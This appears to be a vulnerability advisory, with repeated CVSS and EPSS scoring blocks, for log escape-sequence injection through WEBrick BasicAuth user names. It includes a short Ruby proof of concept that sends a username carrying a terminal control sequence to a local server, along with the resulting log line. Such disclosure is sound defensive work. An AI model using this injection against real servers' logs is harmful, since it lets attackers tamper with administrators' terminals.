8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
0.012 Low
EPSS
Percentile
83.2%
WEBrick BasicAuth outputs any non-existing user name to logs without sanitizing. By exploting this, an attacker can inject malicious escape sequences to its logs. This issue is exactly the same as the old already-fixed vulnerability.
How to reproduce:
require "webrick"
require "webrick/httpauth"
srv = WEBrick::HTTPServer.new({ Port: 34567 })
db = WEBrick::HTTPAuth::Htpasswd.new("dot.htpasswd")
authenticator = WEBrick::HTTPAuth::BasicAuth.new(UserDB: db, Realm: "realm")
srv.mount_proc("/") do |req, res|
authenticator.authenticate(req, res)
res.body = "foobar"
end
srv.start
require "open-uri"
open("http://localhost:34567/login",
http_basic_authentication: [
"ESCAPE SEQUENCE HERE->\e]2;BOOM!\a<-SEE WINDOW TITLE",
"passwd"
]).read
[2017-04-24 19:23:46] ERROR Basic realm: ESCAPE SEQUENCE HERE-><-SEE WINDOW TITLE: the user is not allowed.
Note: I’m a member of the ruby-core team, but I’m not involved with development of WEBrick. I did not create the bug, of course. I will happily accept any bounty if any :-)
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
0.012 Low
EPSS
Percentile
83.2%